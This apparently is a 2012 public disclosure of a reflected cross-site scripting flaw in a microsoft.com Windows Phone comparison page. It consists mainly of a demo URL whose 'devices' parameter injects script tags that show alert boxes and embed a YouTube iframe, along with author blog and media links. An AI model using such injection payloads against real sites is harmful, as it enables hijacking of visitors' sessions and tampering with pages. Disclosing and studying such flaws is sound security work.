www.microsoft.com suffers from a cross site scripting vulnerability.
1ee63e162b6d85810a941910498b15b4fd101ff6d675e0d4b36d5da229ebd7cf
# Date: 19.03.2012
# Author: Sony and Flexxpoint
# Web Browser : Mozilla Firefox
# Sony Blog: http://st2tea.blogspot.com
# Flexxpoint Blog: http://flexxpoint.blogspot.com/
..................................................................
For Ryuzaki Lawlet:
http://s.rimg.info/dd4118cdca0289ab90bcc951bc3f1c72.gif
http://packetstormsecurity.org/files/110597/Microsoft.com-Cross-Site-Scripting.html
Demo:
http://www.microsoft.com/windowsphone/en-us/buy/7/compare.aspx?devices=%22%22%3E%3Cscript%3Ealert%28%22XSS%20by%20Sony%20and%20Flexxpoint%22%29%3C/script%3E%3Cscript%3Ealert%28%22Oh..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Uh..%22%29%3C/script%3E%3Cscript%3Ealert%28%22wow..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Microsoft.com%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Cscript%3Ealert%28%22meow!%22%29%3C/script%3E%3Ciframe%20width=%22420%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/SLcBI3JUKZ4%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E
http://3.bp.blogspot.com/-iQT5Ywe2XL8/T2dQ--4a5WI/AAAAAAAAAxE/IdkN2KNwze4/s1600/microsoft.JPG
http://www.youtube.com/watch?v=4kJL2Rt-FKo